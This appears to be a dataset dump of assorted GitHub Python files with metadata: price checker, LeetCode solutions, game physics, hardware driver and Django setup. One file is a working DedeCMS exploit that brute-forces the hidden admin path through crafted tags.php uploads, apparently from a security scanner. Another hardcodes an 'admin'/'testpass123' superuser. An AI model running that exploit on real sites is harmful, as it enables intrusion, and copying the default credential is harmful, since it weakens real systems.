blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7ed9756d26bc42e54fc782b2e0956c81dd48afb0 | a301e6dd6b215780bbd010ee2276aa58c35e8269 | /app.py | 277ea8f536f6fb3dc8e5bfa2bee83a0ae0c5e097 | [] | no_license | MadelineColeman/Amazon-Price-Checker | 3ab41207077a0e4a3e27c4e520eb8c51996fbd2c | 0b8048c055f6407012cb8926186c99cdcf36cfe1 | refs/heads/main | 2023-01-01T18:04:43.277248 | 2020-10-01T20:08:58 | 2020-10-01T20:08:58 | 300,407,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,481 | py | #%% Import Packages
from bs4 import BeautifulSoup
from urllib.request import Request, urlopen
import smtplib
import time
#%% Declare Varibles
headers = {'User-Agent':'Mozilla/5.0'}
#%%Get Price from Amazon
def getPrice():
url = input("Enter the Amazon Link: ")
email = input("Please enter email to recieve alert: ")
password = input('Please enter email password: ')
req = Request(url, headers = headers)
page = urlopen(req).read()
soup = BeautifulSoup(page)
price = soup.find(id = 'priceblock_ourprice').get_text()
title = soup.find(id = "productTitle").get_text()
price = float(price.split("$", 1)[1])
title = title.strip()
print("The price of " + title + " is ${}".format(price) )
alertPrice = float(input("\nEnter the price you would like to be alerted at: "))
if price <= alertPrice:
sendEmail(title, alertPrice, url, email, password)
else:
time.sleep(3600)
getPrice()
# %% Send Email
def sendEmail(title, alertPrice, url, email, password):
subject = "Amazon Price Alert"
body = "{} is below ${:.2f}. Check out the link below\n{}".format(title, alertPrice, url)
msg = f"Subject: {subject},\n\n{body}"
server = smtplib.SMTP('smtp.gmail.com',587)
server.connect('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.ehlo()
server.login(email, password)
server.sendmail(email, email, msg)
server.quit()
# %% Run Script
getPrice()
| [
"colemanm191@gmail.com"
] | colemanm191@gmail.com |
e8e9487b576b340ae318034c411fb9faf9beddf3 | 0dcf78e319956f2cb2327c5cb47bd6d65e59a51b | /Python3/LinkedList/MergeKSortedLists/Heap023.py | 7010c6ca41757921ac2b6dda3a6dcb0459150e36 | [] | no_license | daviddwlee84/LeetCode | 70edd09a64a6f61492aa06d927e1ec3ab6a8fbc6 | da1774fd07b7326e66d9478b3d2619e0499ac2b7 | refs/heads/master | 2023-05-11T03:16:32.568625 | 2023-05-08T05:11:57 | 2023-05-09T05:11:57 | 134,676,851 | 14 | 4 | null | 2018-05-29T14:50:22 | 2018-05-24T07:18:31 | Python | UTF-8 | Python | false | false | 1,810 | py | from typing import List, Optional, Callable
from ..ListNodeModule import ListNode
import heapq
class HeapWrapper(object):
def __init__(self, initial: List[Optional[ListNode]] = [], key: Callable[[Optional[ListNode]], int] = lambda x: x.val) -> None:
self.key = key
self._data = [(self.key(item), i, item)
for i, item in enumerate(initial) if item]
# The index is use to make each tuple unique, so heapq won't have to compare the "ListNode"
# TypeError: '<' not supported between instances of 'ListNode' and 'ListNode'
self._index = len(self._data)
heapq.heapify(self._data)
def __len__(self):
return len(self._data)
def push(self, item: ListNode):
self._index += 1 # Make sure the index is unique
heapq.heappush(self._data, (self.key(item), self._index, item))
def pop(self):
return heapq.heappop(self._data)[2]
class Solution:
def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:
"""
https://stackoverflow.com/questions/8875706/heapq-with-custom-compare-predicate
https://leetcode.com/problems/merge-k-sorted-lists/solutions/3287717/merge-k-sorted-linked-lists-in-o-n-log-k-time-with-priority-queue-full-explanation/
"""
heap = HeapWrapper(lists)
node = dummy_head = ListNode(None)
while heap:
node.next = heap.pop()
node = node.next
if node.next:
heap.push(node.next)
return dummy_head.next
if __name__ == '__main__':
heap = HeapWrapper([ListNode(num) for num in (1, 2, 3, 4, 5, 6)])
heap.push(ListNode(7))
print(len(heap))
print(heap.pop().val)
print(bool(heap))
print(bool(HeapWrapper())) # Empty is false
| [
"daweilee@microsoft.com"
] | daweilee@microsoft.com |
a28380fa7c747fd2980e91a59c59853a625e2940 | 3cf1535bd23bfbfe078464eb6ba9043e30b2d67d | /RLBotPack/Skybot/bot_functions.py | 39e65467fbe9a1ecf5442a3283ad0c06a4459d71 | [
"MIT"
] | permissive | RLBot/RLBotPack | 11bab3be9dea24521853a5ba3f0ba5716c9922d2 | d4756871449a6e587186e4f5d8830fc73a85c33a | refs/heads/master | 2023-07-09T08:37:05.350458 | 2023-05-17T21:51:07 | 2023-05-17T21:51:07 | 188,609,141 | 27 | 132 | MIT | 2023-09-12T00:02:43 | 2019-05-25T20:24:44 | Python | UTF-8 | Python | false | false | 10,014 | py | import math
def ball_path_predict(data_loc_speed): # [self.game_time, self.ball_lt_z, self.ball_lt_speed_z]
start_on=0
#print(data_loc_speed)
loc_x=data_loc_speed[1][0][start_on]
loc_y=data_loc_speed[1][1][start_on]
loc_z=data_loc_speed[1][2][start_on]
speed_x=data_loc_speed[2][0][start_on]
speed_y=data_loc_speed[2][1][start_on]
speed_z=data_loc_speed[2][2][start_on]
ang_speed_x=data_loc_speed[3][0][start_on]
ang_speed_y=data_loc_speed[3][1][start_on]
ang_speed_z=data_loc_speed[3][2][start_on]
time_i=data_loc_speed[0][start_on]
timer=0
time_l=[]
ground_t=[]
predic_loc_z_t=[]
predic_loc_x_t=[]
predic_loc_y_t=[]
ground_loc_x=[]
ground_loc_y=[]
ground_loc_z=[]
predicted_loc=[[],[[],[],[]],[],[[],[],[]],[],[[],[],[]]]
bounce_t=0
goal=False
ground_next=False
ball_rolling=False
air_friction=0.013
gravity=-650
ball_radius=93
step=1/120
perpendicular_restitution=0.60
#todo: change depending on entry angle
paralel_restitution=0.713
spin_inertia=0.4
while timer < 5:
time=timer-bounce_t
#z
loc_z_t=loc_z+((speed_z*(1-air_friction*time))*time)+(0.5*(gravity)*(time**2))
#x
loc_x_t=loc_x+((speed_x*(1-air_friction*time))*time)
#y
loc_y_t=loc_y+((speed_y*(1-air_friction*time))*time)
if loc_z_t<ball_radius:
speed_z=(speed_z*(1-air_friction*time-step)+gravity*(time-step))
speed_z=abs(speed_z)*perpendicular_restitution
loc_z=ball_radius
loc_x=loc_x+((speed_x*(1-air_friction*time))*time)
loc_y=loc_y+((speed_y*(1-air_friction*time))*time)
bounce_t=timer
ground_next=True
if speed_z < 0.01:
speed_z=0
ground_next=False
ball_rolling=True
speed_x=speed_x*(1-air_friction*time)#*paralel_restitution
speed_y=speed_y*(1-air_friction*time)#*paralel_restitution
if True:
entry_angle = abs(math.atan2(speed_z,math.sqrt(speed_x**2+speed_y**2)))/math.pi*180
# some more magic numbers
custom_friction = (paralel_restitution-1)/(28)*entry_angle +1
# limiting custom_friction to range [e1, 1]
if custom_friction<paralel_restitution: custom_friction=paralel_restitution
speed_x = (speed_x + ang_speed_y * ball_radius * spin_inertia) * paralel_restitution
speed_y = (speed_y - ang_speed_x * ball_radius * spin_inertia) * paralel_restitution
ang_speed_x = -speed_y/ball_radius
ang_speed_y = speed_x/ball_radius
ang_speed_z = speed_z/ball_radius
# limiting ball spin
total_ang_speed = math.sqrt(ang_speed_x**2+ang_speed_y**2+ang_speed_z**2)
if total_ang_speed > 6:
ang_speed_x,ang_speed_y,ang_speed_z = 6*ang_speed_x/total_ang_speed, 6*ang_speed_y/total_ang_speed, 6*ang_speed_z/total_ang_speed
elif abs(loc_z_t)>2044-ball_radius:
loc_z=2044-ball_radius
speed_z=-(speed_z*(1-air_friction*time-step)+gravity*(time-step))
#speed_z=speed_z*(1-air_friction*(time))
speed_z=speed_z*perpendicular_restitution
loc_y=loc_y+((speed_y*(1-air_friction*(time)))*(time))
speed_y=speed_y*(1-air_friction*(time)) #*paralel_restitution
loc_x=loc_x+((speed_x*(1-air_friction*(time)))*(time))
speed_x=speed_x*(1-air_friction*(time)) #*paralel_restitution
if True:
entry_angle = abs(math.atan2(speed_z,math.sqrt(speed_x**2+speed_y**2)))/math.pi*180
# some more magic numbers
custom_friction = (paralel_restitution-1)/(28)*entry_angle +1
# limiting custom_friction to range [e1, 1]
if custom_friction<paralel_restitution: custom_friction=paralel_restitution
speed_x = (speed_x + ang_speed_z * ball_radius * spin_inertia) * custom_friction
speed_y = (speed_y + ang_speed_z * ball_radius * spin_inertia) * paralel_restitution
#speed_z = (speed_x - ang_speed_y * ball_radius * spin_inertia) * paralel_restitution
ang_speed_x = speed_z/ball_radius
ang_speed_y = speed_z/ball_radius
#ang_speed_z = speed_y/ball_radius
# limiting ball spin
total_ang_speed = math.sqrt(ang_speed_x**2+ang_speed_y**2+ang_speed_z**2)
if total_ang_speed > 6:
ang_speed_x,ang_speed_y,ang_speed_z = 6*ang_speed_x/total_ang_speed, 6*ang_speed_y/total_ang_speed, 6*ang_speed_z/total_ang_speed
bounce_t=timer
elif abs(loc_x_t)>4096-ball_radius:
if loc_x>0:
loc_x=4096-ball_radius
else:
loc_x=-4096+ball_radius
speed_x=speed_x*(1-air_friction*(time))
speed_x=-speed_x*perpendicular_restitution
loc_y=loc_y+((speed_y*(1-air_friction*(time)))*(time))
speed_y=speed_y*(1-air_friction*(time))#*paralel_restitution
loc_z=loc_z+((speed_z*(1-air_friction*(time)))*(time))+(0.5*(gravity)*((time)**2))
speed_z=(speed_z*(1-air_friction*(time-step))+gravity*((time-step)))#*paralel_restitution #implement spin
if True:
entry_angle = abs(math.atan2(speed_z,math.sqrt(speed_x**2+speed_y**2)))/math.pi*180
# some more magic numbers
custom_friction = (paralel_restitution-1)/(28)*entry_angle +1
# limiting custom_friction to range [e1, 1]
if custom_friction<paralel_restitution: custom_friction=paralel_restitution
#speed_x = (speed_x + ang_speed_z * ball_radius * spin_inertia) * custom_friction
speed_y = (speed_y + ang_speed_z * ball_radius * spin_inertia) * paralel_restitution
speed_z = (speed_z - ang_speed_y * ball_radius * spin_inertia) * paralel_restitution
#ang_speed_x = -speed_z/ball_radius
ang_speed_y = -speed_z/ball_radius
ang_speed_z = speed_y/ball_radius
# limiting ball spin
total_ang_speed = math.sqrt(ang_speed_x**2+ang_speed_y**2+ang_speed_z**2)
if total_ang_speed > 6:
ang_speed_x,ang_speed_y,ang_speed_z = 6*ang_speed_x/total_ang_speed, 6*ang_speed_y/total_ang_speed, 6*ang_speed_z/total_ang_speed
bounce_t=timer
elif abs(loc_y_t)>5120-ball_radius:
if abs(loc_x_t)<892.755-ball_radius and abs(loc_z_t)<642.775-ball_radius:
goal=True
break
if loc_y>0:
loc_y=5120-ball_radius
else:
loc_y=-5120+ball_radius
speed_y=speed_y*(1-air_friction*time)#*paralel_restitution
speed_y=-speed_y*perpendicular_restitution
loc_z=loc_z+((speed_z*(1-air_friction*time))*time)+(0.5*(gravity)*(time**2))
loc_x=loc_x+((speed_x*(1-air_friction*time))*time)
speed_x=speed_x*(1-air_friction*time)#*paralel_restitution
speed_z=(speed_z*(1-air_friction*(time-step))+gravity*((time-step)))#*paralel_restitution
if True:
entry_angle = abs(math.atan2(speed_z,math.sqrt(speed_x**2+speed_y**2)))/math.pi*180
# some more magic numbers
custom_friction = (paralel_restitution-1)/(28)*entry_angle +1
# limiting custom_friction to range [e1, 1]
if custom_friction<paralel_restitution: custom_friction=paralel_restitution
speed_x = (speed_x - ang_speed_z * ball_radius * spin_inertia) * paralel_restitution
#speed_y = (speed_y + ang_speed_z * ball_radius * spin_inertia) * custom_friction
speed_z = (speed_z + ang_speed_x * ball_radius * spin_inertia) * custom_friction
ang_speed_x = -speed_z/ball_radius
#ang_speed_y = -speed_z/ball_radius
ang_speed_z = speed_y/ball_radius
# limiting ball spin
total_ang_speed = math.sqrt(ang_speed_x**2+ang_speed_y**2+ang_speed_z**2)
if total_ang_speed > 6:
ang_speed_x,ang_speed_y,ang_speed_z = 6*ang_speed_x/total_ang_speed, 6*ang_speed_y/total_ang_speed, 6*ang_speed_z/total_ang_speed
bounce_t=timer
else:
predic_loc_z_t+=[loc_z_t]
predic_loc_x_t+=[loc_x_t]
predic_loc_y_t+=[loc_y_t]
tick_time=[timer+time_i]
time_l+=tick_time
timer+=step
if ground_next:
ground_t+=tick_time
ground_loc_x+=[loc_x_t]
ground_loc_y+=[loc_y_t]
ground_loc_z+=[loc_z_t]
ground_next=False
if ball_rolling:
ground_loc_x+=[loc_x_t]
ground_loc_y+=[loc_y_t]
ground_loc_z+=[loc_z_t]
predicted_loc[0]=time_l
predicted_loc[1][0]=predic_loc_x_t
predicted_loc[1][1]=predic_loc_y_t
predicted_loc[1][2]=predic_loc_z_t
predicted_loc[2]=ground_t
predicted_loc[3][0]=ground_loc_x
predicted_loc[3][1]=ground_loc_y
predicted_loc[3][2]=ground_loc_z
if goal:
predicted_loc[4]=timer
predicted_loc[5][0]=loc_x
predicted_loc[5][1]=loc_y
predicted_loc[5][2]=loc_z
else:
predicted_loc[4]=0
predicted_loc[5][0]=0
predicted_loc[5][1]=0
predicted_loc[5][2]=0
return predicted_loc
| [
"noreply@github.com"
] | RLBot.noreply@github.com |
83ebf96ed9d709453f2542d0921655ff7857ce40 | caf135d264c4c1fdd320b42bf0d019e350938b2d | /04_Algorithms/Leetcode/L24_Swap Nodes in Pairs.py | eba7c0bc0a8f2006110eb82a2b8a1604aa56fe07 | [] | no_license | coolxv/DL-Prep | 4243c51103bdc38972b8a7cbe3db4efa93851342 | 3e6565527ee8479e178852fffc4ccd0e44166e48 | refs/heads/master | 2022-12-31T22:42:20.806208 | 2020-10-23T10:19:19 | 2020-10-23T10:19:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def swapPairs(self, head: ListNode) -> ListNode:
if not head or not head.next:
return head
else:
first = head
second = first.next
afternode = second.next
head = second
head.next = first
first.next = afternode
while afternode and afternode.next:
prevnode = first
first,second = afternode,afternode.next
afternode = second.next
prevnode.next = second
second.next = first
first.next = afternode
return head
| [
"1574572981@qq.com"
] | 1574572981@qq.com |
f851895535c8f43ebe64751ebaf22d82378cf452 | 1e0b77feea4aa08f2aa9ff63feddbc818428a350 | /script/dedecms/dedecms_win_find_manage.py | 77efcee0ec9487364ba143234992930c3a5232e7 | [] | no_license | cleanmgr112/Tentacle | 838b915430166429da3fe4ed290bef85d793fae4 | 175e143fc08d1a6884a126b7da019ef126e116fa | refs/heads/master | 2022-12-08T06:36:28.706843 | 2020-08-26T14:06:35 | 2020-08-26T14:06:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,769 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author: 'orleven'
import itertools
from lib.utils.connect import ClientSession
from lib.core.enums import VUL_LEVEL
from lib.core.enums import VUL_TYPE
from lib.core.enums import SERVICE_PORT_MAP
from script import Script
class POC(Script):
def __init__(self, target=None):
self.service_type = SERVICE_PORT_MAP.WEB
self.name = 'dedecms win manager'
self.keyword = ['dedecms', 'win', 'manager']
self.info = 'Find manager for dedecms'
self.type = VUL_LEVEL.MEDIUM
self.level = VUL_LEVEL.INFO
self.refer = 'https://xz.aliyun.com/t/2064'
Script.__init__(self, target=target, service_type=self.service_type)
async def prove(self):
await self.get_url()
if self.base_url:
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
_data = {
"_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
"_FILES[mochazz][name]": 0,
"_FILES[mochazz][size]": 0,
"_FILES[mochazz][type]": "image/gif"
}
path_list = list(set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.base_url, '../dedecms/'),
self.url_normpath(self.url, 'dedecms/'),
self.url_normpath(self.url, '../dedecms/'),
]))
async with ClientSession() as session:
for path in path_list:
url = path + 'tags.php'
back_dir = ""
flag = 0
async with session.get(url=url) as res:
if res!=None and res.status ==200:
for num in range(1, 7):
if flag ==1 :
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre)
async with session.post(url=url, data=_data) as r:
if r!=None:
if r.status == 405:
return
text = await r.text()
if "Upload filetype not allow !" not in text and r.status == 200:
flag = 1
back_dir = pre
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
flag = 0
x = 0
for i in range(30):
if flag == 1:
x = i
break
for ch in characters:
if ch == characters[-1]:
flag = 1
x = i
break
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
async with session.post(url=url, data=_data) as r:
if r!=None:
if r.status == 405:
return
text = await r.text()
if "Upload filetype not allow !" not in text and r.status == 200:
back_dir += ch
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
if x < 29 and flag ==1:
self.flag = 1
self.req.append({"url": path+ '/'+back_dir})
self.res.append({"info": path+'/'+ back_dir, "key": 'dede_manager'})
| [
"546577246@qq.com"
] | 546577246@qq.com |
db5c540680482b042de2c5eec273df36b97e0aa9 | e0441dd7ce7555a0a36e8f6e306a639e7e2be108 | /py/字符.py | d8129cd6df186a6e73de71dd2c6bc684e2ffbb4f | [] | no_license | knzh/Python | 7e6da74e1e1264de0ab342dfaf54f872d0c90f68 | d527a045c23f3d37ad65596977e615161f2bda6e | refs/heads/master | 2020-05-24T07:17:31.366363 | 2019-12-23T02:36:02 | 2019-12-23T02:36:02 | 187,153,061 | 0 | 0 | null | 2019-05-17T06:10:55 | 2019-05-17T05:38:19 | null | UTF-8 | Python | false | false | 290 | py | message="侃大山计量付款"
print(message)
message_1="abc"
message_2="Abc"
message_3="abc "
message_5=" abc "
print(message_1.title())
print(message_1.upper())
print(message_2.upper())
print(message_2.lower())
print(message_3.rstrip())
print(message_5.lstrip())
print(message_5.strip()) | [
"jykainan@163.com"
] | jykainan@163.com |
ae771cde651399504bba751485f82bbb7e7a73bb | 4628a6c1f54773f87b39146ac989d084234cee62 | /Code Reader/ObjSenseImage.py | 6f0e5df4ea023b88a4e21e936ce53e1e8049beef | [] | no_license | IshanVaidya2007/PyRo-Tutorials | 8e96d7a2ecb54990498699d3c35daf840dc78253 | c4754332bde648734700019235d04efb207aa33c | refs/heads/main | 2023-02-02T19:14:24.960565 | 2020-12-14T05:11:12 | 2020-12-14T05:11:12 | 323,958,833 | 0 | 0 | null | 2020-12-23T17:07:15 | 2020-12-23T17:07:15 | null | UTF-8 | Python | false | false | 1,502 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 31 13:51:42 2020
@author: LearnLeap
"""
import pygame
import time
from Phygital_v0 import Phygital_v0 as pyro
# Pin Initialization
pyro.pinMode('A0','dOutput')
pyro.pinMode('A5','dInput')
#Communication Init
pyro.init("COM8")
pygame.init()
width=660
height=690
screen = pygame.display.set_mode( ( width, height) )
#Set a Title of Screen
pygame.display.set_caption('Object Sensor State')
eventstatus="none"
while True:
pygame.display.update()
try:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pyro.close()
pygame.quit()
eventstaus="quit"
break
if eventstatus=="quit":
break
data=pyro.dRead('A5')
if data==0:
path = pygame.image.load("Images/ObjSensed.png").convert_alpha()
path1=pygame.transform.scale(path,(630,660))
screen.blit(path1,(15,15))
else:
path=pygame.image.load("Images/NoObj.png").convert_alpha()
path1=pygame.transform.scale(path,(630,660))
screen.blit(path1,(15,15))
time.sleep(0.1)
except:
if KeyboardInterrupt:
pyro.close()
break
print("Closing") | [
"noreply@github.com"
] | IshanVaidya2007.noreply@github.com |
162a20d336fdb8bd17fc5ea13e27d793e2d0fc97 | bb8cead9d67a79b7a702e04251fe27f9a782cd60 | /api/run.py | db24ba7234680269e47947c8582baf14cbc5314b | [] | no_license | florianbgt/todo-app | 2d3ead22f884bfb9544bc5523dc6e4ae859c88ad | e2330b1fd797d28777dab7dfe23306b7e1e72a7b | refs/heads/main | 2023-08-28T04:30:25.188341 | 2021-10-25T12:43:00 | 2021-10-25T12:43:00 | 419,964,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE','_project.settings')
import django
django.setup()
from django.core.management import call_command
from django.conf import settings
from django.contrib.auth.models import User
if __name__ == "__main__":
try:
os.remove(settings.DATABASES['default']['NAME'])
except:
print('db does not exists, skip deletion')
call_command("migrate", interactive=False)
if not User.objects.filter(username='admin').exists():
User.objects.create_superuser(
username='admin',
email='',
password='testpass123',
) | [
"florianbgt@users.noreply.github.com"
] | florianbgt@users.noreply.github.com |
a907448564d7d4dbe4324695f4bc955e6226f0d8 | 8658016febe481a7e6ae0d449a3a6d4730fad6d8 | /other/add_two_ll_num.py | 88242fad1dfd23694ed8bdefaf0eebbd798f1a52 | [] | no_license | ashleyhma/hb-challenges | 74b2bc193eeb736a021b17506c8ed2bd270ced2f | 8421195e492ef630211722737241ba484ac827e0 | refs/heads/master | 2020-05-01T08:13:18.827042 | 2019-07-13T16:48:14 | 2019-07-13T16:48:14 | 177,373,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,121 | py | class ListNode(object):
def __init__(self, x, y=None):
self.val = x
self.next = y
class Solution(object):
"""You are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list."""
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
lst1 = []
lst2 = []
c1 = l1
c2 = l2
while c1:
lst1.append(str(c1.val))
c1 = c1.next
while c2:
lst2.append(str(c2.val))
c2 = c2.next
num1 = int(''.join(lst1[::-1]))
num2 = int(''.join(lst2[::-1]))
summ = str(num1+num2)
print(num1 + num2)
return self.list_to_link(summ)
def list_to_link(self, lst):
if len(lst) == 1:
return ListNode(lst[-1])
return ListNode(lst[-1], self.list_to_link(lst[:-1])) | [
"ashleyheidima@gmail.com"
] | ashleyheidima@gmail.com |
7609c254a4dfe0c0e6f990924b4919bcf3d1d726 | cf3510e161b105921639f3a9f4682ca948f72085 | /tensormonk/plots/__init__.py | b6a63b39f6676568d9d667207627ab82f0050d40 | [
"MIT"
] | permissive | Tensor46/TensorMONK | eedf762f42d44e2a9a58859f86c1221c610192ad | 67617d3fdf8fde072ba9cab42de7d67c79b17494 | refs/heads/master | 2022-03-10T08:46:32.489207 | 2021-02-21T14:47:27 | 2021-02-21T14:47:27 | 135,519,908 | 31 | 8 | MIT | 2021-02-21T14:47:28 | 2018-05-31T02:15:39 | Python | UTF-8 | Python | false | false | 188 | py | """ TensorMONK :: plots """
__all__ = ["make_gif", "VisPlots", "line_plot"]
from .gif import make_gif
from .visplots import VisPlots
from .line import line_plot
del gif, visplots, line
| [
"vikas11187@gmail.com"
] | vikas11187@gmail.com |
6067d658856d2331f217e780a4b3cbfee1d37d74 | 6e6ef650d0fd5e5006dab4d755bb4ac77de43072 | /parsing/split.py | 8a33d0d7f4eeac8d5000655ed9752faad65173e6 | [] | no_license | raymondroc/an-open-review-of-openreview | b2f2a4dcd7badbbd55ab535f4f319ae8d888afa6 | 7d94a42096759b36739090f9801dc2a09dec0380 | refs/heads/main | 2023-01-10T15:22:06.851193 | 2020-11-13T18:39:30 | 2020-11-13T18:39:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | import csv
def append(filename, row):
with open(filename, 'a+', newline='') as infile:
csv_appender = csv.writer(infile)
csv_appender.writerow(row)
with open('../authordata.csv', encoding='latin-1') as authorin, open('../openreview_v8_deletions.csv', encoding='latin-1') as reviewin:
author_reader = csv.reader(authorin)
review_reader = csv.reader(reviewin)
cnt = 1
for row_author in author_reader:
row_review = next(review_reader)
if cnt <= 1250:
append('../Check_Authors/alex.csv', row_author[:2] + [row_review[3]] + row_author[2:])
elif cnt <= 2500:
append('../Check_Authors/raymond.csv', row_author[:2] + [row_review[3]] + row_author[2:])
elif cnt <= 3750:
append('../Check_Authors/keshav.csv', row_author[:2] + [row_review[3]] + row_author[2:])
else:
append('../Check_Authors/david.csv', row_author[:2] + [row_review[3]] + row_author[2:])
cnt += 1
| [
"kganapathy23@gmail.com"
] | kganapathy23@gmail.com |
fd665f4ee1a672d4be5eb93dc6f5a52a578af62d | cf297c3d66189d2bd9fd8bfdadaeff3ebe6eee05 | /WebBrickLibs/EventHandlers/tests/DummyRouter.py | aeb6ebe6d84716938a3c453ac113956c324b0805 | [
"BSD-3-Clause"
] | permissive | AndyThirtover/wb_gateway | 0cb68a1f2caf7f06942f94b867ea02f4f8695492 | 69f9c870369085f4440033201e2fb263a463a523 | refs/heads/master | 2022-01-19T00:07:20.456346 | 2022-01-05T21:08:16 | 2022-01-05T21:08:16 | 14,687,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: DummyRouter.py 2612 2008-08-11 20:08:49Z graham.klyne $
#
# Some test helpers for testing event handlers. Uses a SuperGlobal to save state.
#
import logging
import sys
import unittest
from EventLib.Event import Event, makeEvent
from EventHandlers.BaseHandler import *
# a dummy router to log data
class DummyRouter(object):
def __init__( self ):
self._log = logging.getLogger( "DummyRouter" )
self._subs = list()
self._unsubs = list()
self._pubs = list()
def logMe(self):
# write all stuff to the log
self._log.debug( "logMe" )
def subscribe(self, interval, handler, evtype=None, source=None):
self._subs.append( (interval,handler,evtype,source) )
self._log.debug( "subscribe: %i, %s, %s, %s" % (interval,handler,evtype,source) )
def unsubscribe(self, handler, evtype=None, source=None):
self._unsubs.append( (handler,evtype,source) )
self._log.debug( "unsubscribe: %s, %s, %s" % (handler,evtype,source) )
def publish(self, source, event):
self._pubs.append( (source,event) )
self._log.debug( "publish: %s, %s" % (source,event) )
| [
"github@lklyne.co.uk"
] | github@lklyne.co.uk |
8c692fd060f69162e03aad9ec2a23bd52730d207 | cb6dd50eca3d65c1ce34299cd71c4c5a17dbe186 | /pynq/invmat.py | 7ef75c05572db76b7466c61c8554a5d08715fef5 | [
"MIT"
] | permissive | kino2718/InverceMatrixIP | f54063d6cde3008a227364882ab8d5ad3d4d1930 | 0cf56d54ee663db69891a2f4835bde4d0e89bdd9 | refs/heads/master | 2021-01-01T17:45:24.303858 | 2017-10-10T04:08:08 | 2017-10-10T04:08:08 | 98,147,966 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,163 | py | import axis_fifo as fifo
class InvMat:
def __init__(self, size):
self.fifo = fifo.AXISFifo()
self.matlen = size * size
def inv(self, mat):
if (len(mat) != self.matlen):
print("Error: mat size is invalid.")
raise
self.fifo.clear_int(0xffffffff)
sts = self.fifo.int_status()
if (sts != 0):
print("Error: interrupt status register could not clear.")
raise
mat7Q8 = [int(mat[i]*256) for i in range(self.matlen)]
for el in mat7Q8:
if(self.fifo.get_tx_vacancy()):
self.fifo.write(el)
else:
print("Error: tx fifo is not vacancy.")
raise
self.fifo.start_tx(self.matlen)
self.fifo.wait_tx_done()
self.fifo.wait_rx_done(self.matlen)
nbytes = self.fifo.ready_to_read()
m_inv = [None for i in range(self.matlen)]
for i in range(self.matlen):
val = self.fifo.read()
if (val & 0x8000):
val -= 0x10000
m_inv[i] = val/256
return m_inv
| [
"kino2718@gmail.com"
] | kino2718@gmail.com |
c2525abeea57432a93e0578742834f69db4c40a0 | 949e7e53f24d4800ad56e5659628606fd43744a3 | /src/fordisapp/urls.py | 6c313f50354b874cdf932d2780aa325c2dfb46a1 | [] | no_license | JuheePak/Web-project | 4839ed9ff70f1e47fe35097bb398e5924a3a1793 | 0b159a251dad76f246f3c6cd36da58961d7a82b0 | refs/heads/master | 2023-03-23T10:27:50.769648 | 2021-03-21T07:51:47 | 2021-03-21T07:51:47 | 290,143,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | from django.urls import path
from . import views
from django.conf.urls.static import static
from django.conf.urls import include, url
from django.conf import settings
urlpatterns = [
path('', views.index, name="index"),
path('register/', views.register, name="register"),
path('login/', views.login, name="login"),
path('logout/', views.logout, name="logout"),
path('report/', views.report, name="report"),
path('board/', views.board, name="board"),
path('<int:pk>', views.detail, name='detail'),
path('<slug:btype>/<int:pk>', views.detail, name='detail'),
path('<int:pk>/update/', views.update, name='update'),
path('<slug:btype>/<int:pk>/update/', views.update, name='update'),
path('<slug:btype>/<int:article_pk>/comments/<int:comment_pk>/update/', views.comment_update, name='comment_update'),
path('<slug:btype>/<int:article_pk>/comments/<int:comment_pk>/update/<int:comment2_pk>/update/', views.comment2_update, name='comment2_update'),
path('create/', views.create, name='create'),
path('<slug:btype>/create/', views.create, name='create'),
path('<slug:btype>/<int:pk>/comments/create/', views.comment_create, name='comment_create'),
path('<slug:btype>/<int:ppk>/<int:pk>/comments2/create/', views.comment2_create, name='comment2_create'),
path('<slug:btype>/<int:pk>/delete/', views.delete, name='delete'),
